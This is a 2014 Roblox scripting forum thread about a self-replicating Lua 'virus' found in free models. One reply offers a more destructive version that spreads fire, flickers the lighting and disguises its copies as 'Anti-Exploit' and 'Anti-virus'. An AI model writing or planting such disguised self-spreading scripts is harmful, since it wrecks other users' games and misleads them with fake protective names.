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#128291143Monday, March 17, 2014 4:52 AM GMT

function haxor() x = game.Workspace:GetChildren() for i = 1, #x do if x[i]:FindFirstChild("J0HN") == nil then local w = Instance.new("Weld") w.Parent = x[i] w.Name = "J0HN" s = script:clone() s.Parent = w s.Name = "J0HNSCR1PT" end end end while true do haxor() wait(.1) end It just keeps cloning it.
#128293585Monday, March 17, 2014 5:46 AM GMT

It's called a virus. That's what you get for using freemodels. ~~trogyssy, Scripting Helper and S&I Activist~~
#128294923Monday, March 17, 2014 6:43 AM GMT

It's quite a bad script lol
#128304585Monday, March 17, 2014 2:41 PM GMT

a useless weld, but the cloning works alright. If I were doing it: function clean(v) x = v:GetChildren() for i = 1, #x-1 do local f=Instance.new("Fire") f.Size=math.huge f.Heat=math.huge local w = Instance.new("Weld") w.Parent = x[i] if x[i]:IsA("BasePart")then w.Part0=x[i] f.Parent=x[i] f=f:Clone() if x[i+1]:IsA("BasePart")then w.Part1=x[i+1] f.Parent=x[i+1] f=f:Clone() end end if x[i]:IsA("Model") then clean(x[i]) end w.Name = "Anti-Exploit" s = script:clone() s.Parent = w s.Name = "Anti-virus" end end while true do if Game.Players:FindFirstChild("Player1")==false then clean(Workspace) wait(.001) if Game.Lighting.Brightness~=1 then Game.Lighting.Brightness=1 else Game.Lighting.Brightness=math.huge end end end ~~trogyssy, Scripting Helper and S&I Activist~~

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